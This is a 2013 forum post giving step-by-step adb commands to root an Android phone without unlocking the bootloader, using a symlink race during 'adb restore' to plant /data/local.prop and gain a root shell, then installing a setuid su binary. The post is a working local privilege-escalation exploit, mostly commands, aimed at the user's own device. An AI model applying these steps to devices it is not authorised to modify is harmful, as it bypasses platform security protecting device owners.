08-09-13, 10:33 pm
how root without unlocking bootloader this works
root without unlocking bootloader – the way this works is as follows: the “adb restore” command needs to be able to write to /data to restore a backup. because of this, we can find a way to write something to /data while this is being done. now, android parses a file called /data/local.prop on boot. if the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. so, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.
step-by-step root without unlocking bootloader:
You are not allowed to view links. Please Register Or Login
دیدن لینک ها برای شما امکان پذیر نیست . لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید
2) open a command prompt in that same directory;
3) copy the root files to your device:
adb push su /data/local/tmp/su
adb push superuser.apk /data/local/tmp/superuser.apk
4) restore the fake “backup”: adb restore fakebackup.ab note: do not click restore on your device. just enter the command into the command prompt on your pc and press the enter key.
5) run the “exploit”: adb shell “while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done” note: when you enter this command, you should see your adb window flooded with errors — this is what is supposed to happen.
6) now that the “exploit” is running, click restore on your device.
7) once it finishes, reboot your device: adb reboot note: do not try and use your device when it reboots. running this exploit will reboot your device into emulator mode, so it will be laggy and the screen will flicker — this is normal.
8) once it is rebooted, open a shell: adb shell
note: once you do step 8, your should have a root shell, i.e., your prompt should be #, not $. if not, it did not work. start again from step 4. (it may take a few tries for it to work..)
now we can copy su and superuser.apk to the correct spots to give us root.
9) mount the system partition as r/w: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
10) copy su to /system: cat /data/local/tmp/su > /system/bin/su
11) change permissions on su: chmod 06755 /system/bin/su
12) symlink su to /xbin/su: ln -s /system/bin/su /system/xbin/su
13) copy superuser.apk to /system: cat /data/local/tmp/superuser.apk > /system/app/superuser.apk
14) change permissions on superuser.apk: chmod 0644 /system/app/superuser.apk
15) delete the file that the exploit created: rm /data/local.prop
16) exit the adb shell: exit (may have to type exit twice to get back to your command prompt.)
17) type the following (not sure if this is needed for the gnex, but it shouldn’t matter): adb shell “sync; sync; sync;”
18) reboot: adb reboot
19) done. you now should have root without having to unlock your bootloader